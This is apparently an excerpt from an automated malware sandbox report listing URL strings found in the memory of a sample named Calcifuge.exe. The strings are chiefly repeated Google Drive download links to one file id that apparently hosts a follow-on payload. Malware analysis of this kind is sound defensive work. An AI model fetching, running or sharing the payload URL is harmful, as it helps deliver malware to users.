00000006.00000003.2685599217.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2813354716.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2824437296.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2745211350.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480393220.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2880880177.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2365360296.00000000023B3000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 
00000006.00000003.2469244508.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadider
      Source: Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2869418209.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2905951067.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2894361207.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2880880177.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537421481.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000002.2918854097.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2583149665.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2617552588.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2629105429.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2571402123.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2858542036.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2916937010.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2548701285.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2446624829.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or 
memory: https://drive.google.com/K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadider&
      Source: Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480393220.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537421481.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2469244508.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526007166.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492181507.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2583149665.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2457734111.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2571402123.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2503130227.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2548701285.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2514842468.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2275591148.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 
00000006.00000003.2446624829.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadt
      Source: Calcifuge.exe, 00000006.00000003.2423875201.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/R.
      Source: Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480393220.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537421481.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2365360296.00000000023B3000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2469244508.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526007166.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 
00000006.00000003.2492181507.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2583149665.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Z
      Source: Calcifuge.exe, 00000006.00000003.2674274316.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2662875760.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/Z.
      Source: Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2159725261.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2148548358.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/_1
      Source: Calcifuge.exe, 00000006.00000003.2388023562.00000000023B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ertificates
      Source: Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2159725261.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2148548358.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ificate
      Source: Calcifuge.exe, 00000006.00000003.2148548358.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/j.
      Source: Calcifuge.exe, 00000006.00000003.2880880177.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2858542036.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492181507.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2869418209.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2905951067.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2894361207.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/r.
      Source: Calcifuge.exe, 00000006.00000003.2388023562.00000000023B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=do
      Source: Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480393220.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537421481.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2365360296.00000000023B3000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2469244508.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526007166.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2640013882.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492181507.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2583149665.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2457734111.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2662875760.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 
00000006.00000003.2617552588.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2629105429.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/s
      Source: Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2801689509.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2388023562.00000000023B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o
      Source: Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2275591148.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o0062&M
      Source: Calcifuge.exe, 00000006.00000002.2918740581.000000000234E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o3
      Source: Calcifuge.exe, 00000006.00000002.2918740581.000000000234E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o:
      Source: Calcifuge.exe, 00000006.00000003.2836089164.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2869418209.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720820376.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2709155403.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2732007460.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2790780512.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2905951067.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2685599217.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 
00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2813354716.00000000023B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o=
      Source: Calcifuge.exe, 00000006.00000002.2918740581.000000000234E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3oF
      Source: Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720820376.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2709155403.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2732007460.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2790780512.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2159725261.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2685599217.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2813354716.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 
00000006.00000003.2745211350.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3oKL?
      Source: Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2159725261.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2365360296.00000000023B3000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2148548358.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2125585019.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2342872885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2320749731.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2275591148.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2136830469.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3oVN
      Source: Calcifuge.exe, 00000006.00000003.2228056370.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2286992783.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2342872885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2320749731.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2275591148.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3oX
      Source: Calcifuge.exe, 00000006.00000003.2171133228.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2159725261.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2148548358.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2125585019.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2136830469.00000000023B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3oib2
      Source: Calcifuge.exe, 00000006.00000002.2918740581.000000000234E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3ol
      Source: Calcifuge.exe, 00000006.00000002.2918740581.000000000234E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3op#
      Source: Calcifuge.exe, 00000006.00000003.2629105429.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: Calcifuge.exe, 00000006.00000002.2918740581.0000000002389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/;
      Source: Calcifuge.exe, 00000006.00000002.2918740581.0000000002389000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/J
      Source: Calcifuge.exe, 00000006.00000003.2228056370.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/P%
      Source: Calcifuge.exe, 00000006.00000003.2685599217.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKA
      Source: Calcifuge.exe, 00000006.00000003.2756287431.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537372471.0000000002406000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2824437296.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2629105429.00000000023DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download
      Source: Calcifuge.exe, 00000006.00000003.2606375107.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2560383876.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720820376.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2709155403.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2732007460.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2594012453.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2651703631.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2685599217.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2434994885.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2745211350.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2298037851.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2480393220.00000000023B4000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2537421481.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2469244508.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526007166.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2640013882.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2252306252.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 
00000006.00000003.2286992783.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2492181507.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download(
      Source: Calcifuge.exe, 00000006.00000002.2918854097.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2916937010.00000000023B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=download.
      Source: Calcifuge.exe, 00000006.00000003.2571402123.00000000023DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/w&
      Source: powershell.exe, 00000001.00000002.1986896418.0000000005297000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
      Source: Calcifuge.exe, 00000006.00000001.1984960895.0000000000649000.00000020.00000001.01000000.00000008.sdmp String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: powershell.exe, 00000001.00000002.1990657807.00000000061AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
      Source: Calcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ssl.gstatic.com
      Source: Calcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google-analytics.com;report-uri
